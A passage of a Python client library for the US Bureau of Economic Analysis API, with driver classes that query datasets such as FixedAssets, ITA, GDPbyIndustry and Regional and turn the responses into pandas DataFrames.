        # load user preferences defined in userSettings, use suggested parameters, override w fun entry
        query = deepcopy(self._baseRequest)
        query['params'].update({"Frequency": Frequency})
        query['params'].update({"TableID": TableID})
        query['params'].update({"DirectionOfInvestment": DirectionOfInvestment})
        query['params'].update({"OwnershipLevel": OwnershipLevel})
        query['params'].update({"NonbankAffiliatesOnly": NonbankAffiliatesOnly})
        query['params'].update({"Classification": Classification})
        query['params'].update({"Country": Country})
        query['params'].update({"Industry": Industry})
        query['params'].update({"Year": Year})
        query['params'].update({"State": State})
        query['params'].update({"SeriesID": SeriesID})
        query['params'].update({"GetFootnotes": GetFootnotes})
        query['params'].update({"Investment": Investment})
        query['params'].update({"ParentInvestment": ParentInvestment})
        query['params'].update(payload)
        # TODO: try loading different frenquencies if no return
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData, outputFormat)  # a dict of a df or df and meta (tablePretty)
        if verbose == False:
            self._lastLoad = output['dataFrame']
            return(self._lastLoad)
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return(output)

    def _cleanOutput(self, query, retrivedData, outputFormat):
        '''Normalize the raw API response; optionally pivot it into a pretty table.'''
        if query['params']['ResultFormat'] == 'JSON':
            # BUG FIX (both branches): the generated snippet previously omitted
            # the "df_output = " assignment, yet the snippet lines appended
            # below for tablePretty all reference df_output.
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
        else:
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])  # TODO: check this works — meant for XML but still parses JSON
        df_output.meta = ''
        try:
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # Notes are optional; best-effort only
            pass
        output = {'dataFrame': df_output}
        if outputFormat == "tablePretty":
            df_output['LineNumber'] = pd.to_numeric(df_output['LineNumber'])
            df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',', '')))
            # Split the descriptive columns into a separate metadata table.
            meta = df_output.drop(['DataValue', 'TimePeriod'], axis=1).drop_duplicates()
            meta = meta.set_index(['LineNumber', 'SeriesCode', 'LineDescription']).reset_index()
            df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']]
            df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first')
            df_output.meta = ''
            try:
                df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
            except Exception:
                pass
            output = {'dataFrame': df_output, 'metadata': meta}
            # update the code string so the generated snippet mirrors the cleanup above:
            self._cleanCode = self._cleanCode + "\ndf_output['LineNumber'] = pd.to_numeric(df_output['LineNumber']) \n"
            self._cleanCode = self._cleanCode + "df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',',''))) \n"
            self._cleanCode = self._cleanCode + "df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']] \n"
            self._cleanCode = self._cleanCode + "df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first') \n"
        return(output)

    def clipcode(self):
        '''Copy the replication code of the last verbose load to the clipboard.'''
        _clipcode(self)

    def _driverMetadata(self):
        # NOTE(review): these values look copy-pasted from getDatasetlist —
        # this driver's main function is MNE; confirm against the metadata
        # consumer before changing.
        self.metadata = [{
            "displayName": "List of Datasets",
            "method": "datasetlist",  # Name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getFixedAssets():
    '''
    Driver for the BEA "FixedAssets" dataset (API queries).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).

        Args:
            baseRequest (dict): partial request skeleton; defaults to {}
            connectionParameters (dict): connection overrides; defaults to {}
            userSettings (dict): user-setting overrides; defaults to {}
        '''
        # None sentinels instead of mutable {} defaults: a shared default dict
        # would be reused across every instantiation.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def fixedAssets(self,
                    TableName,
                    Year,
                    payload=None,
                    verbose=False
                    ):
        '''
        Query the fixed assets database (API query)
        Sample run -
            fixedAssets('T10101','2010')
        Args:
            TableName (str): the name of the NIPA table, eg 'T10101'
            Year (str): the year; eg 'X' for all years or '2018'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'FixedAssets'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'FixedAssets'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'TableName': TableName})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # The JSON and XML branches were identical, so a single code path serves
        # both result formats.  NOTE(review): the XML path also calls .json();
        # original carried a "TODO: check this works" for that case.
        self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
        df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getITA():
    '''
    Driver for the BEA "ITA" (International Transactions Accounts) dataset (API queries).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).
        '''
        # None sentinels instead of mutable {} defaults shared across calls.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def ITA(self,
            Indicator,
            AreaOrCountry,
            Frequency,
            Year,
            payload=None,
            verbose=False
            ):
        '''
        Query the ITA database (API query)
        Args:
            Indicator (str): ITA indicator code
            AreaOrCountry (str): area or country code
            Frequency (str): eg 'Q'
            Year (str): eg '2019'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'ITA'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'ITA'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'Indicator': Indicator})
        query['params'].update({'AreaOrCountry': AreaOrCountry})
        query['params'].update({'Frequency': Frequency})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # The JSON and XML branches of the original were byte-identical, so a
        # single code path handles both result formats.
        try:  # one-line datasets need to be wrapped in an array
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
        except Exception:
            try:
                self._cleanCode = "df_output = pd.DataFrame([retrivedData.json()['BEAAPI']['Results']['Data']])"
                df_output = pd.DataFrame([retrivedData.json()['BEAAPI']['Results']['Data']])
            except Exception:
                self._cleanCode = "df_output = pd.DataFrame([])"
                df_output = pd.DataFrame([])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getIIP():
    '''
    Driver for the BEA "IIP" (International Investment Position) dataset (API queries).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).
        '''
        # None sentinels instead of mutable {} defaults shared across calls.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def IIP(self,
            TypeOfInvestment,
            Component,
            Frequency,
            Year,
            payload=None,
            verbose=False
            ):
        '''
        Query the IIP database (API query)
        Args:
            TypeOfInvestment (str): type-of-investment code
            Component (str): component code
            Frequency (str): eg 'Q'
            Year (str): eg 'X' for all or '2019'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'IIP'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'IIP'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'TypeOfInvestment': TypeOfInvestment})
        query['params'].update({'Component': Component})
        query['params'].update({'Frequency': Frequency})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # The JSON and XML branches were identical, so a single code path serves
        # both result formats.
        # NOTE(review): original flagged this path as "not working"; it may need
        # 'Dimensions' instead of 'Data' — confirm against a live response.
        self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Data'])"
        df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Data'])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getGDPbyIndustry():
    '''
    Driver for the BEA "GDPbyIndustry" dataset (API queries).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).
        '''
        # None sentinels instead of mutable {} defaults shared across calls.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def GDPbyIndustry(self,
                      Industry,
                      TableID,
                      Frequency,
                      Year,
                      payload=None,
                      verbose=False
                      ):
        '''
        Query the GDPbyIndustry database (API query)
        Args:
            Industry (str): industry code
            TableID (str): table identifier
            Frequency (str): eg 'Q'
            Year (str): eg 'X' for all or '2019'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'GDPbyIndustry'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'GDPbyIndustry'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'Industry': Industry})
        query['params'].update({'TableID': TableID})
        query['params'].update({'Frequency': Frequency})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # BUGFIX: the XML branch used to record replay code with the indices in
        # the wrong order (['BEAAPI'][0]['Results']['Data']) which did not match
        # the code actually executed.  Both branches now share one correct path.
        self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])"
        df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results'][0]['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getRegionalIncome():
    '''
    Deprecated driver kept only to point users at the Regional dataset.
    '''
    def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
        '''
        The baseRequest carries the user key, datasource url, and the preferred
        output format (JSON vs XML).
        '''
        self._lastLoad = {}  # clipboard-like storage of the latest load
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
    def RegionalIncome(self):
        '''
        Deprecated endpoint: prints a notice and returns a placeholder frame
        directing callers to the Regional dataset.
        '''
        deprecationNotice = "RegionalIncome and RegionalProduct were deprecated - use Regional instead - check https://apps.bea.gov/api/_pdf/bea_web_service_api_user_guide.pdf appendix I and J"
        print(deprecationNotice)
        placeholder = pd.DataFrame(['Dataset deprecated - use Regional'])
        return {'dataFrame': placeholder}
class getRegionalProduct():
    '''
    Deprecated driver kept only to point users at the Regional dataset.
    '''
    def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
        '''
        The baseRequest carries the user key, datasource url, and the preferred
        output format (JSON vs XML).
        '''
        self._lastLoad = {}  # clipboard-like storage of the latest load
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
    def RegionalProduct(self):
        '''
        Deprecated endpoint: prints a notice and returns a placeholder frame
        directing callers to the Regional dataset.
        '''
        deprecationNotice = "RegionalIncome and RegionalProduct were deprecated - use Regional instead - check https://apps.bea.gov/api/_pdf/bea_web_service_api_user_guide.pdf appendix I and J"
        print(deprecationNotice)
        placeholder = pd.DataFrame(['Dataset deprecated - use Regional'])
        return {'dataFrame': placeholder}
class getInputOutput():
    '''
    Driver for the BEA "InputOutput" dataset (API queries).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).
        '''
        # None sentinels instead of mutable {} defaults shared across calls.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def InputOutput(self,
                    TableID,
                    Year,
                    payload=None,
                    verbose=False
                    ):
        '''
        Query the InputOutput database (API query)
        Args:
            TableID (str): table identifier
            Year (str): eg 'X' for all or '2019'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'InputOutput'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'InputOutput'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'TableID': TableID})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # The JSON and XML branches were identical, so a single code path serves
        # both result formats.
        self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
        df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getUnderlyingGDPbyIndustry():
    '''
    Driver for the BEA "UnderlyingGDPbyIndustry" dataset (API queries).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).
        '''
        # None sentinels instead of mutable {} defaults shared across calls.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def UnderlyingGDPbyIndustry(self,
                                Industry,
                                TableID,
                                Frequency,
                                Year,
                                payload=None,
                                verbose=False
                                ):
        '''
        Query the UnderlyingGDPbyIndustry database (API query)
        Args:
            Industry (str): industry code
            TableID (str): table identifier
            Frequency (str): eg 'Q'
            Year (str): eg 'X' for all or '2019'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'UnderlyingGDPbyIndustry'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'UnderlyingGDPbyIndustry'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'Industry': Industry})
        query['params'].update({'TableID': TableID})
        query['params'].update({'Frequency': Frequency})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # The JSON and XML branches were identical, so a single code path serves
        # both result formats.
        self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])"
        df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results'][0]['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getIntlServTrade():
    '''
    Driver for the BEA "IntlServTrade" dataset (API queries).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).
        '''
        # None sentinels instead of mutable {} defaults shared across calls.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def IntlServTrade(self,
                      TypeOfService,
                      TradeDirection,
                      Affiliation,
                      AreaOrCountry,
                      Year,
                      payload=None,
                      verbose=False
                      ):
        '''
        Query the IntlServTrade database (API query)
        Args:
            TypeOfService (str): type-of-service code
            TradeDirection (str): trade direction code
            Affiliation (str): affiliation code
            AreaOrCountry (str): area or country code
            Year (str): eg 'X' for all or '2019'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'IntlServTrade'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'IntlServTrade'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({"TypeOfService": TypeOfService})
        query['params'].update({"TradeDirection": TradeDirection})
        query['params'].update({"Affiliation": Affiliation})
        query['params'].update({"AreaOrCountry": AreaOrCountry})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # The JSON and XML branches were identical, so a single code path serves
        # both result formats.
        self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
        df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getRegional():
    '''
    Driver for the BEA "Regional" dataset (API queries).  Replaces the
    deprecated RegionalIncome / RegionalProduct datasets.
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        The baseRequest contains the user key, url of the datasource, and preferred
        output format (JSON vs XML).
        '''
        # None sentinels instead of mutable {} defaults shared across calls.
        baseRequest = {} if baseRequest is None else baseRequest
        connectionParameters = {} if connectionParameters is None else connectionParameters
        userSettings = {} if userSettings is None else userSettings
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def Regional(self,
                 GeoFips,
                 LineCode,
                 TableName,
                 Year,
                 payload=None,
                 verbose=False
                 ):
        '''
        Query the Regional database (API query).
        (Docstring fixed: it previously said "IntlServTrade" by copy-paste.)
        Args:
            GeoFips (str): geographic FIPS code
            LineCode (str): line code
            TableName (str): table name
            Year (str): eg 'X' for all or '2019'
            payload (dict): the request payload basic to this driver; defaults to {'method': 'GETDATA', 'datasetname': 'Regional'}
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload data in lowercase, else may repeat the load (say frequency=A and Frequency=Q will load A and Q)
        if payload is None:  # avoid a shared mutable default argument
            payload = {'method': 'GETDATA', 'datasetname': 'Regional'}
        # load user preferences defined in userSettings, use suggested parameters, override w/ function entry
        query = deepcopy(self._baseRequest)
        query['params'].update({"GeoFips": GeoFips})
        query['params'].update({"LineCode": LineCode})
        query['params'].update({"TableName": TableName})
        query['params'].update({'Year': Year})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict holding a df
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return output
    def _cleanOutput(self, query, retrivedData):
        '''Turn the raw API response into {'dataFrame': df}; records replay code in self._cleanCode.'''
        # The JSON and XML branches were identical, so a single code path serves
        # both result formats.
        self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
        df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
        df_output.meta = ''
        try:
            # Notes are optional; attach them as (non-persistent) metadata
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # narrowed from a bare except: missing Notes is expected
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
